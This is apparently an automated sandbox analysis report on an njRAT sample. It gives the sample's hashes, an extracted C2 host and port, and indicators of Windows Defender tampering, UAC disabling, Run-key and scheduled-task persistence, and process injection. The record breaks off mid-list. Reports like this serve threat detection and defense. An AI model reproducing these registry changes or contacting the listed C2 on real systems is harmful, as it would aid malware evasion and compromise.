Analysis
-
max time kernel
149s -
max time network
150s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
27/01/2024, 05:47
Static task
static1
Behavioral task
behavioral1
Sample
796ed4b0db9b3d50149b39c35c97fb22.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
796ed4b0db9b3d50149b39c35c97fb22.exe
Resource
win10v2004-20231215-en
General
-
Target
796ed4b0db9b3d50149b39c35c97fb22.exe
-
Size
2.8MB
-
MD5
796ed4b0db9b3d50149b39c35c97fb22
-
SHA1
154fde51c43d3a8b8f1b96df04f3e97fe4c922a6
-
SHA256
37db478cd1a50883e179c601987b3a5171823aaa9d04063817fa7af57723ffb7
-
SHA512
762989d2993cc2431b50ae9a2847cc3b16bce41c15da9a974dd90c66884ac28b32698edbf9d13b948d7b1f22919278b43e4448710dda2b2489b509bd6ecf00c7
-
SSDEEP
1536:qfoDCSHH6dNPdeGb0kMzA1UYaER0XBi3IGd0b15grKsYmhUeogKGiGDaLm8G/BaI:O
Malware Config
Extracted
njrat
0.7.3
Client
dontreachme3.ddns.net:3604
EdgeBrowser.exe
-
reg_key
EdgeBrowser.exe
-
splitter
123
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" 796ed4b0db9b3d50149b39c35c97fb22.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" 796ed4b0db9b3d50149b39c35c97fb22.exe -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" EdgeBrowser.exe -
Nirsoft 1 IoCs
resource yara_rule behavioral2/files/0x00090000000231e9-14.dat Nirsoft -
Stops running service(s) 3 TTPs
-
Checks computer location settings 2 TTPs 7 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation EdgeBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 796ed4b0db9b3d50149b39c35c97fb22.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation AdvancedRun.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation 796ed4b0db9b3d50149b39c35c97fb22.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation EdgeBrowser.exe Key value queried \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\Control Panel\International\Geo\Nation EdgeBrowser.exe -
Drops startup file 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 796ed4b0db9b3d50149b39c35c97fb22.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 796ed4b0db9b3d50149b39c35c97fb22.exe -
Executes dropped EXE 15 IoCs
pid Process 5100 AdvancedRun.exe 2756 AdvancedRun.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 1004 AdvancedRun.exe 3324 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 3864 EdgeBrowser.exe 4676 AdvancedRun.exe 3460 EdgeBrowser.exe 3652 EdgeBrowser.exe 2716 AdvancedRun.exe 2776 EdgeBrowser.exe 2896 EdgeBrowser.exe 4380 EdgeBrowser.exe 1376 AdvancedRun.exe 5504 EdgeBrowser.exe -
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\EdgeBrowser.exe = "0" EdgeBrowser.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\796ed4b0db9b3d50149b39c35c97fb22.exe = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features 796ed4b0db9b3d50149b39c35c97fb22.exe -
Adds Run key to start application 2 TTPs 5 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" 796ed4b0db9b3d50149b39c35c97fb22.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" EdgeBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" EdgeBrowser.exe Set value (str) \REGISTRY\USER\S-1-5-21-3791175113-1062217823-1177695025-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7 = "C:\\Program Files\\Common Files\\System\\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\\svchost.exe" EdgeBrowser.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" EdgeBrowser.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 796ed4b0db9b3d50149b39c35c97fb22.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EdgeBrowser.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EdgeBrowser.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA EdgeBrowser.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 796ed4b0db9b3d50149b39c35c97fb22.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 61 IoCs
pid Process 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3864 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 3652 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe 4380 EdgeBrowser.exe -
Suspicious use of SetThreadContext 5 IoCs
description pid Process procid_target PID 2320 set thread context of 5432 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 134 PID 868 set thread context of 3324 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 146 PID 3864 set thread context of 3460 3864 EdgeBrowser.exe 192 PID 3652 set thread context of 2896 3652 EdgeBrowser.exe 239 PID 4380 set thread context of 5504 4380 EdgeBrowser.exe 285 -
Drops file in Program Files directory 1 IoCs
description ioc Process File created C:\Program Files\Common Files\System\ccfP9b0fr9ncIP0szl4Zd59I9922recyNfI908Qw\svchost.exe 796ed4b0db9b3d50149b39c35c97fb22.exe -
Drops file in Windows directory 2 IoCs
description ioc Process File created C:\Windows\EdgeBrowser.exe 796ed4b0db9b3d50149b39c35c97fb22.exe File opened for modification C:\Windows\EdgeBrowser.exe EdgeBrowser.exe -
Launches sc.exe 64 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 3744 sc.exe 2428 sc.exe 5316 sc.exe 1660 sc.exe 5452 sc.exe 2324 sc.exe 3508 sc.exe 4660 sc.exe 4660 sc.exe 3712 sc.exe 564 sc.exe 884 sc.exe 3616 sc.exe 3816 sc.exe 6052 sc.exe 5960 sc.exe 2148 sc.exe 3744 sc.exe 1364 sc.exe 5804 sc.exe 4692 sc.exe 4424 sc.exe 1752 sc.exe 3764 sc.exe 4752 sc.exe 4884 sc.exe 4896 sc.exe 3196 sc.exe 3408 sc.exe 4160 sc.exe 2156 sc.exe 4000 sc.exe 1424 sc.exe 1212 sc.exe 2268 sc.exe 3364 sc.exe 756 sc.exe 3652 sc.exe 1912 sc.exe 2944 sc.exe 6052 sc.exe 1500 sc.exe 928 sc.exe 4160 sc.exe 4424 sc.exe 4796 sc.exe 1800 sc.exe 2804 sc.exe 4884 sc.exe 4160 sc.exe 2428 sc.exe 3512 sc.exe 2268 sc.exe 1212 sc.exe 3196 sc.exe 3108 sc.exe 5304 sc.exe 1760 sc.exe 4448 sc.exe 4736 sc.exe 3860 sc.exe 704 sc.exe 3688 sc.exe 4484 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 5836 2320 WerFault.exe 85 5488 868 WerFault.exe 106 1436 3864 WerFault.exe 152 5428 3652 WerFault.exe 199 2128 4380 WerFault.exe 246 -
Creates scheduled task(s) 1 TTPs 5 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 812 schtasks.exe 5492 schtasks.exe 5864 schtasks.exe 5460 schtasks.exe 2972 schtasks.exe -
Delays execution with timeout.exe 5 IoCs
pid Process 5752 timeout.exe 2128 timeout.exe 3324 timeout.exe 5748 timeout.exe 5752 timeout.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 5100 AdvancedRun.exe 5100 AdvancedRun.exe 5100 AdvancedRun.exe 5100 AdvancedRun.exe 2756 AdvancedRun.exe 2756 AdvancedRun.exe 2756 AdvancedRun.exe 2756 AdvancedRun.exe 2896 powershell.exe 2896 powershell.exe 1376 powershell.exe 1376 powershell.exe 3616 sc.exe 3616 sc.exe 4440 powershell.exe 4440 powershell.exe 1080 powershell.exe 1080 powershell.exe 1360 powershell.exe 1360 powershell.exe 552 powershell.exe 552 powershell.exe 320 powershell.exe 320 powershell.exe 1004 AdvancedRun.exe 1004 AdvancedRun.exe 1004 AdvancedRun.exe 1004 AdvancedRun.exe 1376 powershell.exe 1376 powershell.exe 2896 powershell.exe 2896 powershell.exe 3616 sc.exe 4440 powershell.exe 1080 powershell.exe 1360 powershell.exe 552 powershell.exe 320 powershell.exe 5844 powershell.exe 5844 powershell.exe 5884 powershell.exe 5884 powershell.exe 5928 powershell.exe 5928 powershell.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 5996 powershell.exe 5996 powershell.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 6088 powershell.exe 6088 powershell.exe 5844 powershell.exe 5928 powershell.exe 5884 powershell.exe 6088 powershell.exe 5996 powershell.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 4676 AdvancedRun.exe 4676 AdvancedRun.exe 4676 AdvancedRun.exe 4676 AdvancedRun.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 5100 AdvancedRun.exe Token: SeImpersonatePrivilege 5100 AdvancedRun.exe Token: SeDebugPrivilege 2756 AdvancedRun.exe Token: SeImpersonatePrivilege 2756 AdvancedRun.exe Token: SeDebugPrivilege 2896 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 3616 sc.exe Token: SeDebugPrivilege 4440 powershell.exe Token: SeDebugPrivilege 1080 powershell.exe Token: SeDebugPrivilege 1360 powershell.exe Token: SeDebugPrivilege 552 powershell.exe Token: SeDebugPrivilege 320 powershell.exe Token: SeDebugPrivilege 1004 AdvancedRun.exe Token: SeImpersonatePrivilege 1004 AdvancedRun.exe Token: SeDebugPrivilege 5844 powershell.exe Token: SeDebugPrivilege 5884 powershell.exe Token: SeDebugPrivilege 5928 powershell.exe Token: SeDebugPrivilege 2320 796ed4b0db9b3d50149b39c35c97fb22.exe Token: SeDebugPrivilege 5996 powershell.exe Token: SeDebugPrivilege 6088 powershell.exe Token: SeDebugPrivilege 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe Token: SeDebugPrivilege 4676 AdvancedRun.exe Token: SeImpersonatePrivilege 4676 AdvancedRun.exe Token: SeDebugPrivilege 1580 powershell.exe Token: SeDebugPrivilege 2508 powershell.exe Token: SeDebugPrivilege 3456 powershell.exe Token: SeDebugPrivilege 4316 powershell.exe Token: SeDebugPrivilege 1240 powershell.exe Token: SeDebugPrivilege 3864 EdgeBrowser.exe Token: SeDebugPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: SeDebugPrivilege 2716 AdvancedRun.exe Token: SeImpersonatePrivilege 2716 AdvancedRun.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: SeDebugPrivilege 5212 powershell.exe Token: SeDebugPrivilege 5572 powershell.exe Token: SeDebugPrivilege 3016 powershell.exe Token: SeDebugPrivilege 6072 powershell.exe Token: SeDebugPrivilege 4972 powershell.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: SeDebugPrivilege 3652 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: 33 3460 EdgeBrowser.exe Token: SeIncBasePriorityPrivilege 3460 EdgeBrowser.exe Token: SeDebugPrivilege 1376 AdvancedRun.exe Token: SeImpersonatePrivilege 1376 AdvancedRun.exe Token: SeDebugPrivilege 5300 powershell.exe Token: SeDebugPrivilege 5408 powershell.exe Token: SeDebugPrivilege 1504 powershell.exe Token: SeDebugPrivilege 5700 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2320 wrote to memory of 5100 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 89 PID 2320 wrote to memory of 5100 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 89 PID 2320 wrote to memory of 5100 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 89 PID 5100 wrote to memory of 2756 5100 AdvancedRun.exe 90 PID 5100 wrote to memory of 2756 5100 AdvancedRun.exe 90 PID 5100 wrote to memory of 2756 5100 AdvancedRun.exe 90 PID 2320 wrote to memory of 2896 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 96 PID 2320 wrote to memory of 2896 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 96 PID 2320 wrote to memory of 2896 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 96 PID 2320 wrote to memory of 1376 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 98 PID 2320 wrote to memory of 1376 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 98 PID 2320 wrote to memory of 1376 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 98 PID 2320 wrote to memory of 4440 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 100 PID 2320 wrote to memory of 4440 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 100 PID 2320 wrote to memory of 4440 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 100 PID 2320 wrote to memory of 3616 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 162 PID 2320 wrote to memory of 3616 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 162 PID 2320 wrote to memory of 3616 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 162 PID 2320 wrote to memory of 1080 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 104 PID 2320 wrote to memory of 1080 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 104 PID 2320 wrote to memory of 1080 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 104 PID 2320 wrote to memory of 868 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 106 PID 2320 wrote to memory of 868 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 106 PID 2320 wrote to memory of 868 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 106 PID 2320 wrote to memory of 1360 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 107 PID 2320 wrote to memory of 1360 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 107 PID 2320 wrote to memory of 1360 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 107 PID 2320 wrote to memory of 552 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 112 PID 2320 wrote to memory of 552 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 112 PID 2320 wrote to memory of 552 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 112 PID 2320 wrote to memory of 320 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 110 PID 2320 wrote to memory of 320 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 110 PID 2320 wrote to memory of 320 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 110 PID 868 wrote to memory of 1004 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 113 PID 868 wrote to memory of 1004 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 113 PID 868 wrote to memory of 1004 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 113 PID 2320 wrote to memory of 2404 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 118 PID 2320 wrote to memory of 2404 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 118 PID 2320 wrote to memory of 2404 2320 796ed4b0db9b3d50149b39c35c97fb22.exe 118 PID 4984 wrote to memory of 5452 4984 cmd.exe 121 PID 4984 wrote to memory of 5452 4984 cmd.exe 121 PID 2404 wrote to memory of 5748 2404 cmd.exe 123 PID 2404 wrote to memory of 5748 2404 cmd.exe 123 PID 2404 wrote to memory of 5748 2404 cmd.exe 123 PID 868 wrote to memory of 5844 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 124 PID 868 wrote to memory of 5844 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 124 PID 868 wrote to memory of 5844 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 124 PID 868 wrote to memory of 5884 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 126 PID 868 wrote to memory of 5884 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 126 PID 868 wrote to memory of 5884 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 126 PID 868 wrote to memory of 5928 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 129 PID 868 wrote to memory of 5928 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 129 PID 868 wrote to memory of 5928 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 129 PID 868 wrote to memory of 5996 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 130 PID 868 wrote to memory of 5996 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 130 PID 868 wrote to memory of 5996 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 130 PID 868 wrote to memory of 6088 868 4cJUfE9Xd0b5WLb2c096f785mW2dK8e551jRc4vH8OT8by7.exe 132 PID 868 wrote to memory of 6088 868 